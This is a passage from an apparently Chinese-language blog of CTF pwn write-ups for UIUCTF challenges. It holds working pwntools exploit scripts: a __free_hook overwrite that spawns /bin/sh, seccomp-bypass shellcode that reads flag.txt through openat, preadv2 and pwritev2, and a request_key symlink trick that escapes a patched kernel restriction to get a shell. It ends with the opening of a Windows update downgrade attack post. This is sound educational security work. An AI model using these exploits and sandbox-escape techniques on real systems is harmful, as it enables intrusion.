function_">delete_note</span>(<span class="params">index</span>):</span><br><span class="line">    r.sendlineafter(<span class="string">b"&gt; "</span>, <span class="string">b"2"</span>)</span><br><span class="line">    r.sendlineafter(<span class="string">b"&gt; "</span>, <span class="string">b"2"</span>)</span><br><span class="line">    r.sendlineafter(<span class="string">b"&gt; "</span>, <span class="built_in">str</span>(index).encode())</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">read_rule</span>(<span class="params">index</span>):</span><br><span class="line">    r.sendlineafter(<span class="string">b"&gt; "</span>, <span class="string">b"3"</span>)</span><br><span class="line">    r.sendlineafter(<span class="string">b"&gt; "</span>, <span class="string">b"1"</span>)</span><br><span class="line">    r.sendlineafter(<span class="string">b"&gt; "</span>, <span class="built_in">str</span>(index).encode())</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">read_note</span>(<span class="params">index</span>):</span><br><span class="line">    r.sendlineafter(<span class="string">b"&gt; "</span>, <span class="string">b"3"</span>)</span><br><span class="line">    r.sendlineafter(<span class="string">b"&gt; "</span>, <span class="string">b"2"</span>)</span><br><span class="line">    r.sendlineafter(<span class="string">b"&gt; "</span>, <span class="built_in">str</span>(index).encode())</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">edit_rule</span>(<span class="params">index, content</span>):</span><br><span class="line">    r.sendlineafter(<span class="string">b"&gt; "</span>, <span class="string">b"4"</span>)</span><br><span class="line">    r.sendlineafter(<span class="string">b"&gt; "</span>, <span class="string">b"1"</span>)</span><br><span class="line">    r.sendlineafter(<span class="string">b"&gt; "</span>, <span class="built_in">str</span>(index).encode())</span><br><span class="line">    r.sendlineafter(<span class="string">b"&gt; "</span>, content)</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">edit_note</span>(<span class="params">index, content</span>):</span><br><span class="line">    r.sendlineafter(<span class="string">b"&gt; "</span>, <span class="string">b"4"</span>)</span><br><span class="line">    r.sendlineafter(<span class="string">b"&gt; "</span>, <span class="string">b"2"</span>)</span><br><span class="line">    r.sendlineafter(<span class="string">b"&gt; "</span>, <span class="built_in">str</span>(index).encode())</span><br><span class="line">    r.sendlineafter(<span class="string">b"&gt; "</span>, content)</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">make_law</span>():</span><br><span class="line">    r.sendlineafter(<span class="string">b"&gt; "</span>, <span class="string">b"5"</span>)</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">main</span>():</span><br><span class="line">    conn()</span><br><span class="line">    <span class="comment"># r.interactive()</span></span><br><span class="line"></span><br><span class="line">    make_law()</span><br><span class="line">    libc_leak = <span class="built_in">int</span>(r.recvuntil(<span class="string">b","</span>, drop=<span class="literal">True</span>), <span class="number">16</span>)</span><br><span class="line">    info(<span class="string">f"[L3ak] libc leak: <span class="subst">{<span class="built_in">hex</span>(libc_leak)}</span>"</span>)</span><br><span class="line">    libc.address = libc_leak - <span class="number">0x1ecbe0</span></span><br><span class="line">    info(<span class="string">f"[C4lc] libc base: <span class="subst">{<span class="built_in">hex</span>(libc.address)}</span>"</span>)</span><br><span class="line">    free_hook_addr = libc.symbols[<span class="string">'__free_hook'</span>]</span><br><span class="line">    info(<span class="string">f"[C4lc] free hook addr: <span class="subst">{<span class="built_in">hex</span>(free_hook_addr)}</span>"</span>)</span><br><span class="line">    system_addr = libc.sym[<span class="string">'system'</span>]</span><br><span class="line">    info(<span class="string">f"[C4lc] system addr: <span class="subst">{<span class="built_in">hex</span>(system_addr)}</span>"</span>)</span><br><span class="line">    create_note()</span><br><span class="line">    create_note()</span><br><span class="line">    create_note()</span><br><span class="line">    create_note()</span><br><span class="line">    delete_note(<span class="number">3</span>)</span><br><span class="line">    delete_note(<span class="number">2</span>)</span><br><span class="line">    delete_note(<span class="number">1</span>)</span><br><span class="line">    delete_note(<span class="number">0</span>)</span><br><span class="line">    create_rule()</span><br><span class="line">    edit_rule(<span class="number">0</span>, p64(free_hook_addr))</span><br><span class="line">    create_note()</span><br><span class="line">    create_note()</span><br><span class="line">    payload = p64(system_addr)</span><br><span class="line">    <span class="comment"># gdb.attach(r)</span></span><br><span class="line">    edit_note(<span class="number">1</span>, payload)           <span class="comment"># overwrite free_hook with system</span></span><br><span class="line">    edit_note(<span class="number">0</span>, <span class="string">b"/bin/sh\x00"</span>)    <span class="comment"># set /bin/sh as argument</span></span><br><span class="line">    delete_note(<span class="number">0</span>)                  <span class="comment"># delete_note wiil trigger free_hook, which will call system("{what's in note}")</span></span><br><span class="line"></span><br><span class="line">    r.interactive()</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">"__main__"</span>:</span><br><span class="line">    main()</span><br></pre></td></tr></tbody></table></figure>

<h2 id="Syscalls"><a href="#Syscalls" class="headerlink" title="Syscalls"></a>Syscalls</h2><h3 id="概况-3"><a href="#概况-3" class="headerlink" title="概况"></a>概况</h3><blockquote>
<p>You can’t escape this fortress of security.</p>
<p>143 Solves</p>
</blockquote>
<p>这道题是赛中独立解出来的。</p>
<h3 id="题目分析-3"><a href="#题目分析-3" class="headerlink" title="题目分析"></a>题目分析</h3><p>这道题非常简单，程序会将我们的输入作为 shellcode 直接执行，但是通过<code>seccomp</code>对系统调用做了限制。用<a href="https://github.com/david942j/seccomp-tools">seccomp-tools</a>能清晰地看到<code>seccomp</code>的规则：</p>
<figure class="highlight bash"><table><tbody><tr><td class="code"><pre><span class="line">seccomp-tools dump ./syscalls</span><br><span class="line">The flag is <span class="keyword">in</span> a file named flag.txt located <span class="keyword">in</span> the same directory as this binary. That<span class="string">'s all the information I can give you.</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string"> line  CODE  JT   JF      K</span></span><br><span class="line"><span class="string">=================================</span></span><br><span class="line"><span class="string"> 0000: 0x20 0x00 0x00 0x00000004  A = arch</span></span><br><span class="line"><span class="string"> 0001: 0x15 0x00 0x16 0xc000003e  if (A != ARCH_X86_64) goto 0024</span></span><br><span class="line"><span class="string"> 0002: 0x20 0x00 0x00 0x00000000  A = sys_number</span></span><br><span class="line"><span class="string"> 0003: 0x35 0x00 0x01 0x40000000  if (A &lt; 0x40000000) goto 0005</span></span><br><span class="line"><span class="string"> 0004: 0x15 0x00 0x13 0xffffffff  if (A != 0xffffffff) goto 0024</span></span><br><span class="line"><span class="string"> 0005: 0x15 0x12 0x00 0x00000000  if (A == read) goto 0024</span></span><br><span class="line"><span class="string"> 0006: 0x15 0x11 0x00 0x00000001  if (A == write) goto 0024</span></span><br><span class="line"><span class="string"> 0007: 0x15 0x10 0x00 0x00000002  if (A == open) goto 0024</span></span><br><span class="line"><span class="string"> 0008: 0x15 0x0f 0x00 0x00000011  if (A == pread64) goto 0024</span></span><br><span class="line"><span class="string"> 0009: 0x15 0x0e 0x00 0x00000013  if (A == readv) goto 0024</span></span><br><span class="line"><span class="string"> 0010: 0x15 0x0d 0x00 0x00000028  if (A == sendfile) goto 0024</span></span><br><span class="line"><span class="string"> 0011: 0x15 0x0c 0x00 0x00000039  if (A == fork) goto 0024</span></span><br><span class="line"><span class="string"> 0012: 0x15 0x0b 0x00 0x0000003b  if (A == execve) goto 0024</span></span><br><span class="line"><span class="string"> 0013: 0x15 0x0a 0x00 0x00000113  if (A == splice) goto 0024</span></span><br><span class="line"><span class="string"> 0014: 0x15 0x09 0x00 0x00000127  if (A == preadv) goto 0024</span></span><br><span class="line"><span class="string"> 0015: 0x15 0x08 0x00 0x00000128  if (A == pwritev) goto 0024</span></span><br><span class="line"><span class="string"> 0016: 0x15 0x07 0x00 0x00000142  if (A == execveat) goto 0024</span></span><br><span class="line"><span class="string"> 0017: 0x15 0x00 0x05 0x00000014  if (A != writev) goto 0023</span></span><br><span class="line"><span class="string"> 0018: 0x20 0x00 0x00 0x00000014  A = fd &gt;&gt; 32 # writev(fd, vec, vlen)</span></span><br><span class="line"><span class="string"> 0019: 0x25 0x03 0x00 0x00000000  if (A &gt; 0x0) goto 0023</span></span><br><span class="line"><span class="string"> 0020: 0x15 0x00 0x03 0x00000000  if (A != 0x0) goto 0024</span></span><br><span class="line"><span class="string"> 0021: 0x20 0x00 0x00 0x00000010  A = fd # writev(fd, vec, vlen)</span></span><br><span class="line"><span class="string"> 0022: 0x25 0x00 0x01 0x000003e8  if (A &lt;= 0x3e8) goto 0024</span></span><br><span class="line"><span class="string"> 0023: 0x06 0x00 0x00 0x7fff0000  return ALLOW</span></span><br><span class="line"><span class="string"> 0024: 0x06 0x00 0x00 0x00000000  return KILL</span></span><br></pre></td></tr></tbody></table></figure>

<p>可以看到<code>execve</code>和<code>execveat</code>都被禁用，因此不能直接弹<code>shell</code>。<code>open</code>, <code>read</code>, <code>write</code>也被禁用。</p>
<h3 id="攻击思路-2"><a href="#攻击思路-2" class="headerlink" title="攻击思路"></a>攻击思路</h3><p>可以在<a href="https://x64.syscall.sh/">syscall.sh</a>搜索<code>open</code>/<code>read</code>/<code>write</code>找到可替代的系统调用：<code>open</code>可以用<code>openat</code>替代，<code>read</code>可以用<code>preadv2</code>替代，<code>write</code>可以用<code>pwritev2</code>替代，仍然是用<code>orw</code>（open, read, write）的方式读<code>./flag.txt</code>。用法可以通过搜索<code>man &lt;syscall name&gt;</code>找到：</p>
<ol>
<li><p><code>openat()</code>用法</p>
<figure class="highlight c"><table><tbody><tr><td class="code"><pre><span class="line"><span class="type">int</span> <span class="title function_">openat</span><span class="params">(<span class="type">int</span> dirfd, <span class="type">const</span> <span class="type">char</span> *pathname, <span class="type">int</span> flags)</span>;</span><br><span class="line"><span class="type">int</span> <span class="title function_">openat</span><span class="params">(<span class="type">int</span> dirfd, <span class="type">const</span> <span class="type">char</span> *pathname, <span class="type">int</span> flags, <span class="type">mode_t</span> mode)</span>;</span><br></pre></td></tr></tbody></table></figure>

<blockquote>
<p>If <em>pathname</em> is relative and <em>dirfd</em> is the special value <strong>AT_FDCWD</strong>, then <em>pathname</em> is interpreted relative to the current working directory of the calling process </p>
</blockquote>
<p><code>openat(AT_FDCWD, './flag.txt', 0)</code>代表以只读模式打开当前工作目录下的<code>./flag.txt</code>文件。</p>
</li>
<li><p><code>preadv2()</code>和<code>pwritev2()</code>用法</p>
<figure class="highlight c"><table><tbody><tr><td class="code"><pre><span class="line"><span class="type">ssize_t</span> <span class="title function_">preadv2</span><span class="params">(<span class="type">int</span> fd, <span class="type">const</span> <span class="keyword">struct</span> iovec *iov, <span class="type">int</span> iovcnt, <span class="type">off_t</span> offset, <span class="type">int</span> flags)</span>;</span><br><span class="line"><span class="type">ssize_t</span> <span class="title function_">pwritev2</span><span class="params">(<span class="type">int</span> fd, <span class="type">const</span> <span class="keyword">struct</span> iovec *iov, <span class="type">int</span> iovcnt, <span class="type">off_t</span> offset, <span class="type">int</span> flags)</span>;</span><br></pre></td></tr></tbody></table></figure>

<p>对不熟悉的系统调用/函数一般可以从互联网上找例子来理解：</p>
<figure class="highlight c"><table><tbody><tr><td class="code"><pre><span class="line"><span class="type">char</span>          *str0 = <span class="string">"hello "</span>;</span><br><span class="line"><span class="type">char</span>          *str1 = <span class="string">"world\n"</span>;</span><br><span class="line"><span class="type">ssize_t</span>       nwritten;</span><br><span class="line"><span class="class"><span class="keyword">struct</span> <span class="title">iovec</span>  <span class="title">iov</span>[2];</span></span><br><span class="line"></span><br><span class="line">iov[<span class="number">0</span>].iov_base = str0;</span><br><span class="line">iov[<span class="number">0</span>].iov_len = <span class="built_in">strlen</span>(str0);</span><br><span class="line">iov[<span class="number">1</span>].iov_base = str1;</span><br><span class="line">iov[<span class="number">1</span>].iov_len = <span class="built_in">strlen</span>(str1);</span><br><span class="line"></span><br><span class="line">nwritten = writev(STDOUT_FILENO, iov, <span class="number">2</span>);</span><br></pre></td></tr></tbody></table></figure>

<p>即<code>iov</code>是一个结构体数组，每个结构体前8字节为要读/写的地址，后8字节为要读/写的长度；<code>iovcnt</code>用来表示数组中元素数量。</p>
<blockquote>
<p>Unlike preadv() and pwritev(), if the offset argument is -1, then the current file offset is used and updated.</p>
<p>The flags argument contains a bitwise OR of zero or more of the following flags …</p>
</blockquote>
<p><code>offset</code>设置为1其实是让系统替我们管理偏移量，<code>flags</code>通常都是设置为0即可。</p>
</li>
</ol>
<h3 id="exp-3"><a href="#exp-3" class="headerlink" title="exp"></a>exp</h3><figure class="highlight python"><table><tbody><tr><td class="code"><pre><span class="line"><span class="comment">#!/usr/bin/env python3</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">exe = ELF(<span class="string">"./syscalls_patched"</span>)</span><br><span class="line"></span><br><span class="line">context.binary = exe</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">conn</span>():</span><br><span class="line">    <span class="keyword">if</span> args.LOCAL:</span><br><span class="line">        r = process([exe.path])</span><br><span class="line">        <span class="keyword">if</span> args.DEBUG:</span><br><span class="line">            gdb.attach(r)</span><br><span class="line">    <span class="keyword">else</span>:</span><br><span class="line">        r = remote(<span class="string">"syscalls.chal.uiuc.tf"</span>, <span class="number">1337</span>, ssl=<span class="literal">True</span>)</span><br><span class="line"></span><br><span class="line">    <span class="keyword">return</span> r</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">main</span>():</span><br><span class="line">    r = conn()</span><br><span class="line"></span><br><span class="line">    <span class="comment"># openat(AT_FDCWD, "./flag.txt", 0)</span></span><br><span class="line">    <span class="comment"># preadv2(3, {"rsp", 0x50}, 1, 0, 0)</span></span><br><span class="line">    <span class="comment"># pwritev2(1, {"rsp", 0x50}, 1, -1, 0)</span></span><br><span class="line"></span><br><span class="line">    shellcode = asm(</span><br><span class="line">        <span class="string">"""</span></span><br><span class="line"><span class="string">        mov rax, 257</span></span><br><span class="line"><span class="string">        mov rdi, -100</span></span><br><span class="line"><span class="string">        mov rsi, 0x7478</span></span><br><span class="line"><span class="string">        push rsi</span></span><br><span class="line"><span class="string">        mov rsi, 0x742e67616c662f2e</span></span><br><span class="line"><span class="string">        push rsi</span></span><br><span class="line"><span class="string">        mov rsi, rsp</span></span><br><span class="line"><span class="string">        xor rdx, rdx</span></span><br><span class="line"><span class="string">        syscall</span></span><br><span class="line"><span class="string">        mov rdi, rax</span></span><br><span class="line"><span class="string">        mov rax, 327</span></span><br><span class="line"><span class="string">        mov r12, rsp</span></span><br><span class="line"><span class="string">        add r12, 0x50</span></span><br><span class="line"><span class="string">        mov r11, 0x50</span></span><br><span class="line"><span class="string">        push r11</span></span><br><span class="line"><span class="string">        push r12</span></span><br><span class="line"><span class="string">        mov rsi, rsp</span></span><br><span class="line"><span class="string">        mov rdx, 1</span></span><br><span class="line"><span class="string">        mov r10, -1</span></span><br><span class="line"><span class="string">        mov r8, 0</span></span><br><span class="line"><span class="string">        syscall</span></span><br><span class="line"><span class="string">        mov rax, 328</span></span><br><span class="line"><span class="string">        mov rdi, 1</span></span><br><span class="line"><span class="string">        syscall</span></span><br><span class="line"><span class="string">        """</span></span><br><span class="line">    )</span><br><span class="line">    <span class="comment"># gdb.attach(r, '''</span></span><br><span class="line">    <span class="comment"># b *$rebase(0x12d6)'''</span></span><br><span class="line">    <span class="comment"># )</span></span><br><span class="line">    <span class="built_in">print</span>(shellcode)</span><br><span class="line">    r.sendline(shellcode)</span><br><span class="line"></span><br><span class="line">    r.interactive()</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">"__main__"</span>:</span><br><span class="line">    main()</span><br></pre></td></tr></tbody></table></figure>

<p>我知道可以用<code>shellcraft</code>来构造 shellcode，但我就爱自己写 XD。</p>
<h2 id="Syscalls-2"><a href="#Syscalls-2" class="headerlink" title="Syscalls 2"></a>Syscalls 2</h2><h3 id="概况-4"><a href="#概况-4" class="headerlink" title="概况"></a>概况</h3><blockquote>
<p>I made it harder ;)<br>Hint: It’s not a bug, it’s a feature!</p>
<p>8 Solves</p>
</blockquote>
<p>exp 修改自 robbert1978。</p>
<h3 id="题目分析-4"><a href="#题目分析-4" class="headerlink" title="题目分析"></a>题目分析</h3><p>这道题对内核做了patch：</p>
<figure class="highlight diff"><table><tbody><tr><td class="code"><pre><span class="line">From 1470120abb93fb80ee0ac52feab611418ec957d7 Mon Sep 17 00:00:00 2001</span><br><span class="line">From: YiFei Zhu &lt;zhuyifei@google.com&gt;</span><br><span class="line">Date: Wed, 26 Jun 2024 19:39:11 -0700</span><br><span class="line">Subject: [PATCH] prctl: Add a way to prohibit file descriptor creation</span><br><span class="line"></span><br><span class="line">They are avoided by enforcing a failure when the kernel tries to</span><br><span class="line">allocate a free fd. To be extra extra safe, attempting to install</span><br><span class="line">an fd after the point of no return will panic.</span><br><span class="line"></span><br><span class="line">Child processes inherit the restriction just like seccomp.</span><br><span class="line"></span><br><span class="line">Signed-off-by: YiFei Zhu &lt;zhuyifei@google.com&gt;</span><br><span class="line"><span class="comment">---</span></span><br><span class="line"> fs/file.c                  | 7 +++++++</span><br><span class="line"> include/linux/sched.h      | 5 +++++</span><br><span class="line"> include/uapi/linux/prctl.h | 2 ++</span><br><span class="line"> kernel/fork.c              | 3 +++</span><br><span class="line"> kernel/sys.c               | 3 +++</span><br><span class="line"> 5 files changed, 20 insertions(+)</span><br><span class="line"></span><br><span class="line"><span class="comment">diff --git a/fs/file.c b/fs/file.c</span></span><br><span class="line"><span class="comment">index 3b683b9101d8..d9562f8bca85 100644</span></span><br><span class="line"><span class="comment">--- a/fs/file.c</span></span><br><span class="line"><span class="comment">+++ b/fs/file.c</span></span><br><span class="line"><span class="meta">@@ -503,6 +503,9 @@</span> static int alloc_fd(unsigned start, unsigned end, unsigned flags)</span><br><span class="line"> 	int error;</span><br><span class="line"> 	struct fdtable *fdt;</span><br><span class="line"> </span><br><span class="line"><span class="addition">+	if (task_uiuctf_no_fds_allowed(current))</span></span><br><span class="line"><span class="addition">+		return -EPERM;</span></span><br><span class="line"><span class="addition">+</span></span><br><span class="line"> 	spin_lock(&amp;files-&gt;file_lock);</span><br><span class="line"> repeat:</span><br><span class="line"> 	fdt = files_fdtable(files);</span><br><span class="line"><span class="meta">@@ -604,6 +607,10 @@</span> void fd_install(unsigned int fd, struct file *file)</span><br><span class="line"> 	struct files_struct *files = current-&gt;files;</span><br><span class="line"> 	struct fdtable *fdt;</span><br><span class="line"> </span><br><span class="line"><span class="addition">+	if (task_uiuctf_no_fds_allowed(current))</span></span><br><span class="line"><span class="addition">+		panic("Installing fds is actually not allowed and "</span></span><br><span class="line"><span class="addition">+		      "I'm not trying to hide a bypass");</span></span><br><span class="line"><span class="addition">+</span></span><br><span class="line"> 	if (WARN_ON_ONCE(unlikely(file-&gt;f_mode &amp; FMODE_BACKING)))</span><br><span class="line"> 		return;</span><br><span class="line"> </span><br><span class="line"><span class="comment">diff --git a/include/linux/sched.h b/include/linux/sched.h</span></span><br><span class="line"><span class="comment">index 3c2abbc587b4..f4584022dc4c 100644</span></span><br><span class="line"><span class="comment">--- a/include/linux/sched.h</span></span><br><span class="line"><span class="comment">+++ b/include/linux/sched.h</span></span><br><span class="line"><span class="meta">@@ -1698,6 +1698,8 @@</span> static __always_inline bool is_percpu_thread(void)</span><br><span class="line"> #define PFA_SPEC_IB_FORCE_DISABLE	6	/* Indirect branch speculation permanently restricted */</span><br><span class="line"> #define PFA_SPEC_SSB_NOEXEC		7	/* Speculative Store Bypass clear on execve() */</span><br><span class="line"> </span><br><span class="line"><span class="addition">+#define PFA_UIUCTF_NO_FDS_ALLOWED	10</span></span><br><span class="line"><span class="addition">+</span></span><br><span class="line"> #define TASK_PFA_TEST(name, func)					\</span><br><span class="line"> 	static inline bool task_##func(struct task_struct *p)		\</span><br><span class="line"> 	{ return test_bit(PFA_##name, &amp;p-&gt;atomic_flags); }</span><br><span class="line"><span class="meta">@@ -1739,6 +1741,9 @@</span> TASK_PFA_CLEAR(SPEC_IB_DISABLE, spec_ib_disable)</span><br><span class="line"> TASK_PFA_TEST(SPEC_IB_FORCE_DISABLE, spec_ib_force_disable)</span><br><span class="line"> TASK_PFA_SET(SPEC_IB_FORCE_DISABLE, spec_ib_force_disable)</span><br><span class="line"> </span><br><span class="line"><span class="addition">+TASK_PFA_TEST(UIUCTF_NO_FDS_ALLOWED, uiuctf_no_fds_allowed)</span></span><br><span class="line"><span class="addition">+TASK_PFA_SET(UIUCTF_NO_FDS_ALLOWED, uiuctf_no_fds_allowed)</span></span><br><span class="line"><span class="addition">+</span></span><br><span class="line"> static inline void</span><br><span class="line"> current_restore_flags(unsigned long orig_flags, unsigned long flags)</span><br><span class="line"> {</span><br><span class="line"><span class="comment">diff --git a/include/uapi/linux/prctl.h b/include/uapi/linux/prctl.h</span></span><br><span class="line"><span class="comment">index 370ed14b1ae0..6075c202ca43 100644</span></span><br><span class="line"><span class="comment">--- a/include/uapi/linux/prctl.h</span></span><br><span class="line"><span class="comment">+++ b/include/uapi/linux/prctl.h</span></span><br><span class="line"><span class="meta">@@ -306,4 +306,6 @@</span> struct prctl_mm_map {</span><br><span class="line"> # define PR_RISCV_V_VSTATE_CTRL_NEXT_MASK	0xc</span><br><span class="line"> # define PR_RISCV_V_VSTATE_CTRL_MASK		0x1f</span><br><span class="line"> </span><br><span class="line"><span class="addition">+#define PRCTL_UIUCTF_NO_FDS_ALLOWED 100</span></span><br><span class="line"><span class="addition">+</span></span><br><span class="line"> #endif /* _LINUX_PRCTL_H */</span><br><span class="line"><span class="comment">diff --git a/kernel/fork.c b/kernel/fork.c</span></span><br><span class="line"><span class="comment">index aebb3e6c96dc..692c01b13c9a 100644</span></span><br><span class="line"><span class="comment">--- a/kernel/fork.c</span></span><br><span class="line"><span class="comment">+++ b/kernel/fork.c</span></span><br><span class="line"><span class="meta">@@ -2559,6 +2559,9 @@</span> __latent_entropy struct task_struct *copy_process(</span><br><span class="line"> 	 */</span><br><span class="line"> 	copy_seccomp(p);</span><br><span class="line"> </span><br><span class="line"><span class="addition">+	if (task_uiuctf_no_fds_allowed(current))</span></span><br><span class="line"><span class="addition">+		task_set_uiuctf_no_fds_allowed(p);</span></span><br><span class="line"><span class="addition">+</span></span><br><span class="line"> 	init_task_pid_links(p);</span><br><span class="line"> 	if (likely(p-&gt;pid)) {</span><br><span class="line"> 		ptrace_init_task(p, (clone_flags &amp; CLONE_PTRACE) || trace);</span><br><span class="line"><span class="comment">diff --git a/kernel/sys.c b/kernel/sys.c</span></span><br><span class="line"><span class="comment">index 8bb106a56b3a..5bb16543a565 100644</span></span><br><span class="line"><span class="comment">--- a/kernel/sys.c</span></span><br><span class="line"><span class="comment">+++ b/kernel/sys.c</span></span><br><span class="line"><span class="meta">@@ -2760,6 +2760,9 @@</span> SYSCALL_DEFINE5(prctl, int, option, unsigned long, arg2, unsigned long, arg3,</span><br><span class="line"> 	case PR_RISCV_V_GET_CONTROL:</span><br><span class="line"> 		error = RISCV_V_GET_CONTROL();</span><br><span class="line"> 		break;</span><br><span class="line"><span class="addition">+	case PRCTL_UIUCTF_NO_FDS_ALLOWED:</span></span><br><span class="line"><span class="addition">+		task_set_uiuctf_no_fds_allowed(current);</span></span><br><span class="line"><span class="addition">+		break;</span></span><br><span class="line"> 	default:</span><br><span class="line"> 		error = -EINVAL;</span><br><span class="line"> 		break;</span><br><span class="line"><span class="deletion">-- </span></span><br><span class="line">2.45.1</span><br><span class="line"></span><br></pre></td></tr></tbody></table></figure>

<p>题目自定义了一个系统调用，程序调用<code>prctl(PRCTL_UIUCTF_NO_FDS_ALLOWED)</code>后，会阻止<code>alloc_fd()</code>和<code>fd_install()</code>正常运行，并且在对<code>copy_process()</code>的修改中使得<code>fork</code>的子程序会继承这一属性。因此预期解是使用<code>io_uring</code>来读 flag：</p>
<ol>
<li><code>io_uring</code>本身不需要一个新的 fd</li>
<li><code>io_uring</code>管理了自己的 fd 表，不会触发<code>alloc_fd</code>和<code>fd_install</code></li>
</ol>
<h3 id="攻击思路-3"><a href="#攻击思路-3" class="headerlink" title="攻击思路"></a>攻击思路</h3><p>但是我更喜欢非预期解：</p>
<p>首先需要理解<code>request_key</code>系统调用。参考<a href="https://man7.org/linux/man-pages/man2/request_key.2.html">manpage</a>，用法如下：</p>
<figure class="highlight c"><table><tbody><tr><td class="code"><pre><span class="line"><span class="type">key_serial_t</span> <span class="title function_">request_key</span><span class="params">(<span class="type">const</span> <span class="type">char</span> *type, <span class="type">const</span> <span class="type">char</span> *description,</span></span><br><span class="line"><span class="params">							<span class="type">const</span> <span class="type">char</span> *_Nullable callout_info,</span></span><br><span class="line"><span class="params">							<span class="type">key_serial_t</span> dest_keyring)</span>;</span><br></pre></td></tr></tbody></table></figure>

<blockquote>
<p>If the kernel cannot find a key matching type and description, and callout is not NULL, then the kernel attempts to invoke a user-space program to instantiate a key with the given type and description.  In this case, the following steps are performed:<br>…<br>    (3)  The kernel creates a process that executes a user-space service such as request-key(8) with a new session keyring that contains a link to the authorization key, V. This program is supplied with the following command-line arguments:</p>
<p>​		[0]  The string “/sbin/request-key”.</p>
</blockquote>
<p>也就是说，当我们指定的<code>type</code>和<code>description</code>能让内核无法找到对应的<code>key</code>，它就会运行<code>/sbin/request-key</code></p>
<p>非预期解的思路是：</p>
<ol>
<li>将<code>/sbin/request_key</code>设为<code>/init</code>的符号链接</li>
<li>将<code>/chal</code>设置为<code>/bin/bash</code>的符号链接</li>
<li>使用系统调用<code>request_key</code>，并传入内核无法识别的<code>type</code>和<code>description</code></li>
<li><code>request_key</code>将调用<code>/sbin/rquest-key-&gt;/init</code>，新的<code>/init</code>不会有<code>no_fds</code>的过滤</li>
<li><code>/init</code>执行<code>exec /chal-&gt;/bin/bash</code>，弹出 shell</li>
</ol>
<h3 id="exp-4"><a href="#exp-4" class="headerlink" title="exp"></a>exp</h3><figure class="highlight python"><table><tbody><tr><td class="code"><pre><span class="line"><span class="comment">#!/usr/bin/env python3</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">context.arch = <span class="string">"amd64"</span></span><br><span class="line">shellcode = asm(<span class="string">"""</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">    lea rdi, [rip + offset init]</span></span><br><span class="line"><span class="string">    lea rsi, [rip + offset request_key]</span></span><br><span class="line"><span class="string">    mov eax, 0x58</span></span><br><span class="line"><span class="string">    syscall</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">    lea rdi, [rip + offset chal]</span></span><br><span class="line"><span class="string">    mov eax, 0x57</span></span><br><span class="line"><span class="string">    syscall</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">    lea rdi, [rip + offset bash]</span></span><br><span class="line"><span class="string">    lea rsi, [rip + offset chal]</span></span><br><span class="line"><span class="string">    mov eax, 0x58</span></span><br><span class="line"><span class="string">    syscall</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">    lea rdi, [rip + offset a]</span></span><br><span class="line"><span class="string">    lea rsi, [rip + offset b]</span></span><br><span class="line"><span class="string">    lea rdx, [rip + offset c]  </span></span><br><span class="line"><span class="string">    mov r10, 0xfffffffd </span></span><br><span class="line"><span class="string">    mov rax, 0xf9       </span></span><br><span class="line"><span class="string">    </span></span><br><span class="line"><span class="string">    syscall</span></span><br><span class="line"><span class="string">    ret</span></span><br><span class="line"><span class="string">a:</span></span><br><span class="line"><span class="string">    .asciz "user"</span></span><br><span class="line"><span class="string">b:</span></span><br><span class="line"><span class="string">    .asciz "BeaCox:nonsense"</span></span><br><span class="line"><span class="string">c:</span></span><br><span class="line"><span class="string">    .asciz "payload:data"</span></span><br><span class="line"><span class="string">init:</span></span><br><span class="line"><span class="string">    .asciz "/init"</span></span><br><span class="line"><span class="string">chal:</span></span><br><span class="line"><span class="string">    .asciz "/chal"</span></span><br><span class="line"><span class="string">request_key:</span></span><br><span class="line"><span class="string">    .asciz "/sbin/request-key"</span></span><br><span class="line"><span class="string">bash:</span></span><br><span class="line"><span class="string">    .asciz "/bin/bash"</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">"""</span>)</span><br><span class="line"></span><br><span class="line"><span class="built_in">print</span>(shellcode.<span class="built_in">hex</span>())</span><br></pre></td></tr></tbody></table></figure>

]]></content>
      <categories>
        <category>CTF</category>
      </categories>
      <tags>
        <tag>PWN</tag>
      </tags>
  </entry>
  <entry>
    <title>Windows 更新降级攻击复现与分析</title>
    <url>/posts/windows-downgrade/</url>
    <content><![CDATA[<p>SafeBreach 的安全研究员 Alon Leviev 在 Black Hat 2024 上揭示了两个漏洞CVE-2024-38202 和 CVE-2024-21302 ，可用于破坏 Windows 更新的完整性并重新引入数千个以前修复的漏洞，从而将修补后的系统重新变成 0day 漏洞的目标。</p>
<h2 id="环境准备"><a href="#环境准备" class="headerlink" title="环境准备"></a>环境准备</h2><p>Windows版本：Windows 11 消费者版本 23H2（2024年6月更新）x64</p>
<p>磁力连接：</p>
<figure class="highlight markdown"><table><tbody><tr><td class="code"><pre><span class="line">ed2k://|file|zh-cn<span class="emphasis">_windows_</span>11<span class="emphasis">_consumer_</span>editions<span class="emphasis">_version_</span>23h2<span class="emphasis">_updated_</span>june<span class="emphasis">_2024_</span>x64<span class="emphasis">_dvd_</span>78b33b16.iso|7141826560|9BCE0FF18791A035ED8541A3EF8C791A|/</span><br></pre></td></tr></tbody></table></figure>

<p>下载后导入到 VMware。</p>
